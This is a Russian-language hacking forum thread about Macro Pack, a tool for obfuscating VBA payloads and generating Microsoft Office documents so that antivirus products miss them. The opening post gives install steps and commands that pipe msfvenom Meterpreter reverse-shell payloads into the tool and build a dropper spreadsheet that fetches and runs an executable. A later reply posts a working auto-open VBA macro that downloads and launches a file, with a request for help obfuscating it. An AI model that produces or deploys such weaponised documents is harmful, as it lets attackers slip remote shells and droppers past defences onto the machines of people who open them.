 |
11.10.2017, 23:10
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
Приветствую, сегодня хочу представить аудитории инструмент, целью которого является обфускация вашего, или где-то позаимствованного кода. Итогом будет, как обещают авторы, снижение агрессии на него АВ-программ. Я полагаю, не нужно обьяснять, что обфусцированные примеры не стоит постить на любимый многими «хакерами» ресурс.
Вот собственно, Macro Pack:
Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba –полезной нагрузки в окончательный документ Office.
Более подробная информация находится тут:
> sevagas/macro_pack
Особенности:- Отсутствует необходимость конфигурирования
- Необходимые действия могут быть выполнены одной строкой кода
- Создание Word, Excel и PowerPoint документов
Инструмент совместим с полезными нагрузками, создаваемыми популярными пентест инструментами (Metasploit, Empire, ...). Также легко сочетается с другими утилитами. Этот инструмент написан на Python3 и работает как на платформе Linux, так и на платформе Windows.
Примечание:
Для Windows необходим подлинный пакет MS Office для автоматической генерации документов Office или троянских функций
Обфускация: - Переименование функций
- Переименование переменных
- Удаление пробелов
- Удаление комментариев
- Кодирующие строки
Обратите внимание, что основная цель обфускации Macro Pack заключается не в противодействии обратной инженерии, а в предотвращении обнаружения антивируса.
Установка:
Код:
Код:
git clone https://github.com/sevagas/macro_pack
cd macro_pack
Код:
Код:
pip3 install -r requirements.txt
Примечание. Для Windows вам необходимо загрузить вручную pywin32
> https://sourceforge.net/projects/pywin32/files/pywin32/
Справка:
Код:
Код:
macro_pack.py --help
Использование:
Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba.
Код:
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v meterobf.vba
Обфускация Empire stager vba файла и создание документа MS Word:
Код:
Код:
macro_pack.py -f empire.vba -o -W myDoc.docm
Создание файла MS Excel, содержащего обфускационную капельницу (загрузите файл loadload.exe и храните его как drop.exe)
Код:
Код:
echo "https: //myurl.url/payload.exe" "drop.exe" | macro_pack.py -o -t DROPPER -x "drop.xlsm"
Создание документа Word 97, содержащего обфускацию полезной нагрузки обратного подключения VBA в общей папке:
Код:
Код:
msfvenom.bat -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.exe -o -w \\ REMOTE-PC \ Share \ meter.doc
Рассмотрим это на небольшом примере:
Обфусцируем VBA от Metasploit:
Код:
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba –o 123.txt
Код:
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v 1234.vba
Результат будет таким:
Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера.
Спасибо за внимание |
|
|
16.09.2018, 08:28
|
|
Познающий
Регистрация: 20.02.2018
Сообщений: 43
С нами:
4330456
Репутация:
0
|
|
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте
|
|
|
|
16.09.2018, 14:19
|
|
Новичок
Регистрация: 18.05.2017
Сообщений: 0
С нами:
4730912
Репутация:
0
|
|
jonni80 сказал(а):
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте
Сегодня поставил все отлично работает. Попробуйте установить pip3 такой командой:
Код:
sudo apt install python3-pip
потом установите зависимости и перейдите в src там будет macro_pack.py
|
|
|
|
29.07.2019, 22:57
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 0
С нами:
3834575
Репутация:
0
|
|
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?
Код:
Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub autoopen()
Dim ret As Long
Dim HTTPfile As String, LocalFile As String
HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
LocalFile = "C:\Users\Public\putty.exe"
ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
Dim CurDirBackup As String
Shell "C:\Users\Public\putty.exe", vbNormalFocus
End Sub
|
|
|
|
08.01.2020, 15:43
|
|
Новичок
Регистрация: 10.12.2019
Сообщений: 0
С нами:
3383413
Репутация:
0
|
|
acuntenix сказал(а):
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?
Код:
Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub autoopen()
Dim ret As Long
Dim HTTPfile As String, LocalFile As String
HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
LocalFile = "C:\Users\Public\putty.exe"
ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
Dim CurDirBackup As String
Shell "C:\Users\Public\putty.exe", vbNormalFocus
End Sub
Что ты добьешься тем что у тебя выполнится патти ?
сессию надо прокидывать метера
|
|
|
|
17.01.2020, 20:01
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
я чето шеллкода тут не увидел)
если сравнить с этим
а так хотелось узнать, как его действительно можно обфусцировать) |
|
|
|
18.01.2020, 11:05
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
вот тут если что SHELLCODE за - Encod-ить можно) ecx86/shellcode_encoder
раз уж тема про него)
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
